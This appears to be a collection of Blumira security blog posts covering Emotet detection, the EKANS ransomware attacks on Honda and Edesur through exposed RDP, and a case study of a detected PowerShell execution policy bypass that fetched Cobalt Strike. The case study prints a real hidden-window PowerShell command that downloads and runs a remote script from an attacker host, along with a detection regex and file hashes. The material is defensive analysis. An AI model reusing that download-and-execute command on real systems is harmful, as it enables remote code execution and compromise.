Integrated Security for Advanced Threat Detection & Response
Blumira easily integrates with both Proofpoint and PAN. That means when you connect these tools with Blumira’s cloud SIEM platform, you can start sending logs and events to us for parsing and analysis.
Our pre-built detection rules identify any attacker techniques or malware that matches either Emotet’s profile or that of the malware and ransomware that can follow as a result (including lateral movement or any indicators of stolen credentials and unauthorized access attempts). Then we alert your team and provide a playbook on how to respond, block the threat, or next steps for remediation.
To keep our platform up to date on the latest threats, Blumira ingests many different types of data feeds. One of the many threat intelligence feeds we use is Abuse.ch’s Feodo Tracker that includes blocklists of malicious botnet servers associated with Dridex, Emotet/Heodo.
To protect against attacks like Emotet, your security team needs to automate their threat detection, investigation, analysis and response. Blumira helps surface the most important findings with contextual evidence to save your team the time to go into every security tool and pull information, then decide what to do next. We automate the incident response process to provide both visibility and speed for security operations so you can better protect your organization against malware attacks.
Threat Detection & Response Assessment
Protecting against cyberthreats in this era of remote work is more challenging than ever. Do you know if your organization has all of the capabilities to detect and respond to modern threats?
To help you do a gap analysis, Blumira has created a checklist of the different areas of threat detection and response – from logging to alerting to audits and compliance – so you can measure your current security maturity and identify any missing capabilities.
Medium
A few weeks ago, a ransomware attack hit major Japanese car manufacturer Honda. A similar attack struck the systems of Edesur, a distributor of electricity in Argentina owned by Enel Argentina, a green energy supplier.
The attack affected Honda’s ability to access its computer servers, email and internal systems, as well as impacting its production systems located outside of Japan, according to the BBC. This resulted in the suspension of production in North America, Turkey, Italy, Japan and the U.K. The company also temporarily shut down its customer and financial services operations. Honda stated that one of its internal servers was attacked externally, and that the virus had spread throughout its network.
In a comparison of malware samples targeting Honda and Enel posted online, Malwarebytes Labs found that the incidents may be tied to the EKANS/SNAKE ransomware family. EKANS includes not only traditional file encryption and ransomware note features, but also additional functionality that forcibly stops ICS-related (industrial control system) operational processes, according to a Dragos analysis. That could explain why this particular type of ransomware targeted both manufacturing and energy plants (Honda and Edesur).
How was the ransomware delivered? While many organizations are typically infected with ransomware via phishing emails, Malwarebytes Labs found that both companies had some machines with RDP (Remote Desktop Protocol) access exposed publicly to the internet.
While they can’t validate that it was the actual threat vector in this particular scenario, RDP is one of the most targeted methods to gain entry and infect systems with ransomware, as I wrote about previously in Top Security Threats: Detecting Ransomware Tactics.
A Coveware report from 2019 found that RDP was one of the most common attack vectors for ransomware, accounting for 57% of all infections, followed by phishing 26%.
Source: Coveware
While RDP should never be internet-facing, as it’s not a secure method of remote management, there are occasionally misconfigurations that may leave it open. In Verizon’s 2020 Data Breach Investigations Report (DBIR), they noted that errors (or misconfigurations) are now equally as common as social breaches, and more common than malware, spanning every industry. They cite the increase over time since 2017 largely due to internet-exposed storage discovered by security researchers and third parties.
Detecting RDP Misconfigurations and Connections
To help your team quickly respond to any risky connections that could result in potential ransomware infection, Blumira can detect and alert on any unauthorized access attempts. Our platform prioritizes the threats and notifies your responders of any public IPs attempting to connect via RDP to your network.
For automated threat response, you can follow our step-by-step workflows to take immediate action. With Blumira’s Dynamic Block List, you can block the public source IPs from connecting to your network via RDP and reduce your overall attack surface.
By integrating automated threat detection, correlation, analysis, hunting, response and remediation all in one platform, you can ease the burden on your limited IT or security staff, while detecting any indications of ransomware early enough to contain its impact on your company.
Related Content
Video: Replace Your SIEM With Automated Detection & Response – SIEMs provide a lot of complexity with little security value. See how Blumira’s modern security platform provides threat detection and response, with security orchestration and automation built into one simple platform.
Webinar: How to Automate Threat Detection & Response – Join Blumira’s VP of Ops Patrick Garrity for an overview of how to automate your threat detection & response with Blumira’s modern security platform.
Detecting RDP Attacks With Honeypots – See our honeypot data on remote access attack trends against RDP since the start of the pandemic and rise in remote work, and join our webinar to learn more.
Medium
The other day here at Blumira we had a customer detection trigger that caught our attention. This was a detection I created a while back with zero false positives so far for a PowerShell execution policy bypass attempt. Attackers and malicious software can leverage the PowerShell execution policy setting to execute code on systems without administrative access.
Digging deeper into the attack, we can see some interesting files from a popular hacking tool called Cobalt Strike. In this article, we’ll cover how we were able to detect the attack, details about other information we were able to obtain on the compromised host, and what Cobalt Strike is.
Threat Detection
One of the main sources of rule and alert creation we use is the research that the offensive security community provides. Along with the everyday findings and creations of TTPs (Tactics, Techniques, & Procedures) from potential attackers, there are also a large set of alerts that have been used to detect malicious activity for years. In the blog post “15 Ways to Bypass the PowerShell Execution Policy,” Scott outlines the different ways an attacker or malicious software can bypass this feature.
The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the systems. By default, it is set to “Restricted.“ While this setting is not meant to be a security control, it is used often by attackers and malicious software to execute code on a system without having administrative-level access.
Other information regarding powershell TTPs can be found in the Mitre ATT&CK Framework:
There are several different ways to alert on PowerShell commands and scripts, including third-party software. It is also fairly straightforward to enable it in Microsoft Group Policy. To enable it in a Group Policy Object (GPO), configure the following settings:
- Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Configuration > Detailed Tracking > Audit Process Creation > Enable
- Computer Configuration > Policies > Administrative Templates > System > Audit Process Creation > Include command line in process creation events > Enable
- User Configuration > Policies > Administrative Templates > Windows Components > Windows Powershell > Enable and set module names to *
After the advanced audit settings are configured, an attempt at bypassing the execution policy would end up showing up in the Event Viewer under Applications & Service logs > Microsoft > Windows > PowerShell > Operational as EventID 4103 shown below:
Below is attempt #4 from the Netspi blog mentioned above:
“Download Script from URL and Execute with Invoke Expression
This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.”
When looking at the different ways that the execution policy can be bypassed, we were able to pull out all of the XML as well as the parsed logs through Blumira to create a couple regexs that would cover a majority of the attacks. Now don’t be too critical of this next part. I’m no regex master, but hey – it worked. Here’s a portion of the regex:
Host Application = .*((-(Enc|command Write-Host|nop |noprofile))|ExecutionPolicy (UnRestricted|Bypass|Remote-signed)|DownloadString
OR
ParameterBinding\\(Set-ExecutionPolicy\\): name=.ExecutionPolicy.; value=.(UnRestricted|Bypass|Remote-signed)
Threat Deep Dive
One of the major features we’ve built into Blumira’s platform are customized playbooks attached to each security finding of malicious or anomalous activity. They enable the customer to track if an administrative event or some other purposeful action has triggered a finding. In this case, our customer indicated that this was *not* an administrative action, and were directed on next steps to take.
Blumira Customer Alert
The Blumira finding is listed below. In this alert, you can see the commands run at the bottom of the screenshot under “Matched Evidence.”
Click to enlarge
We see the command:
powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('https://js.choosebudget.com:443/sc\u0441'))\
This is the same command we tested above after enabling advanced auditing; just with a malicious file as the URL instead.
If we break down the PowerShell command itself, it looks like this:
- Powershell.exe – specifies it will be a standard PS command
- -nop – This is a shortened version of -noprofile. A PowerShell profile is a script that runs when PowerShell starts. You can use the profile as a logon script to customize the environment. You can add commands, aliases, functions, variables, snap-ins, modules and PowerShell drives. The -nop option starts PS without loading any profiles.
- -w hidden – This is a shortened version of -WindowStyle, which sets the window style for the session. Valid values are Normal, Minimized, Maximized and Hidden.
- -c – This is the shortened version of -Command, which is followed by the command to run
- IEX – The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.
- New-Object – The New-Object cmdlet creates an instance of a .NET Framework or COM object.
- Net.webclient – Provides common methods for sending data to and receiving data from a resource identified by a URI.
The rest is the listed download string for the webclient to pull files down locally.
The Attack
At this point, we know that the client downloaded a file from a specific URL through PowerShell. What else can we find out about this file by looking at the server it came from?
Nslookup js.choosebudget.com
Non-authoritative answer:
Name: js.choosebudget.com
Address: 104.161.32.85
According to Shodan, this host is located in Phoenix at a hosting provider, however the hostname is dy.huanx9t.cn (the top-level domain for China), and listening on ports 22, 443, and 50050.
The downloaded file ends up being a .tgz file (archived zipped file) and the hash shows as being a Cobalt Strike file.
Cobalt Strike is software that was created for Adversary simulations and red team operations. While it’s not commonly seen outside of red team or penetration test engagements, it’s also not unheard of for portions of this and other offensive team software to be used for malicious purposes. Specifically, the Beacon module of Cobalt Strike in this instance was used. It is the portion of the application that can execute PowerShell scripts, download files, and spawn other payloads.
After some additional investigation, we can see additional files from the same host all with the same MD5 hash:
➜ md5sum jschoosebudget.tgz
c59d2934eb5f452495a095e966958c05 jschoosebudget.tgz
➜ md5sum metadataupdate
c59d2934eb5f452495a095e966958c05 metadataupdate
➜ md5sum SchedulerTransfer
c59d2934eb5f452495a095e966958c05 SchedulerTransfer
➜ md5sum shopping300.mdb
c59d2934eb5f452495a095e966958c05 shopping300.mdb
➜ md5sum z__82D6h
c59d2934eb5f452495a095e966958c05 z__82D6h
Blumira’s Recommendations for Mitigation
In Blumira’s playbook for this threat detection (also known as the workflow), we provide two options for the customer to complete – since it was marked as “not an administrative action,” we offer a recommended threat mitigation, seen below:
Click to Enlarge
That mitigation is:
“Perform an audit of the device and pay close attention to any PowerShell commands that have been executed by examining logs around this time of the event. Remove the device from the network if possible, and perform any internal incident response procedures.”
This recommended mitigation comes from Blumira’s own internal security team to help customers quickly respond to detected threats – regardless if they have robust security teams of their own on staff. This is just one example of the many types of threats we detect in near real-time.